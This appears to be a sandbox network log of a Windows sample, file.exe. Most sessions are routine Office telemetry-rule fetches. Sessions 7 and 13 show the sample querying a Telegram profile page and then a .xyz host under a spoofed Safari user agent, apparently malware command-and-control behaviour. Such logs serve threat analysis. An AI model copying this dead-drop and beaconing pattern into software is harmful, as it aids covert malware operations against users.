Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	49714	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:19 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:19 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:19 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 2eed8dc4-701e-0098-0dc6-3e395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103319Z-178bfbc474bbcwv4hC1NYCypys00000007800000000034qa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:19 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	49710	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:19 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:19 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:19 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 6cd4c015-001e-0028-29fd-3ec49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103319Z-174c587ffdfldtt2hC1TEBwv9c00000005h000000000mucs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:19 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49715	149.154.167.99	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:19 UTC	86	OUT	GET /fu4chmo HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:20 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:33:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12309 Connection: close Set-Cookie: stel_ssid=c86a2bc3e83d9526fd_10934509592577603230; expires=Tue, 26 Nov 2024 10:33:20 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-11-25 10:33:20 UTC	12309	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 66 75 34 63 68 6d 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @fu4chmo</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.5	49717	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:21 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:21 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 73bf7d7c-c01e-000b-6bd1-3ee255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103321Z-178bfbc474bgvl54hC1NYCsfuw000000077g00000000asnf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:21 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49719	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:21 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:21 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: ce5ebd39-a01e-0053-183c-3c8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103321Z-15b8b599d88pxmdghC1TEBux9c00000005xg000000008rba x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:21 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49718	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:21 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:21 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: c312cdef-801e-0083-52a3-3ef0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103321Z-178bfbc474bmqmgjhC1NYCy16c000000079g00000000c1nh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:21 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.5	49721	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:21 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:21 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: ba9b913e-601e-0001-2f1a-3dfaeb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103321Z-178bfbc474bp8mkvhC1NYCzqnn000000079g0000000001b3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:22 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49720	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:21 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:22 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: dbeb181e-a01e-0050-28df-3ddb6e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103322Z-15b8b599d88vp97chC1TEB5pzw00000005w00000000028tq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:22 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49722	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:22 UTC	224	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49723	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:23 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:23 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103323Z-174c587ffdf8lw6dhC1TEBkgs800000005tg00000000a3mu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:24 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49724	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:23 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:24 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103324Z-174c587ffdf4zw2thC1TEBu34000000005t000000000kem7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:24 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49725	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:23 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:24 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: b101f067-f01e-0020-26b7-3e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103324Z-178bfbc474bscnbchC1NYCe7eg00000007g00000000059f9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:24 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49726	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:23 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:24 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: eb93f719-b01e-0098-406c-3dcead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103324Z-15b8b599d88z9sc7hC1TEBkr4w00000005zg000000005f7u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
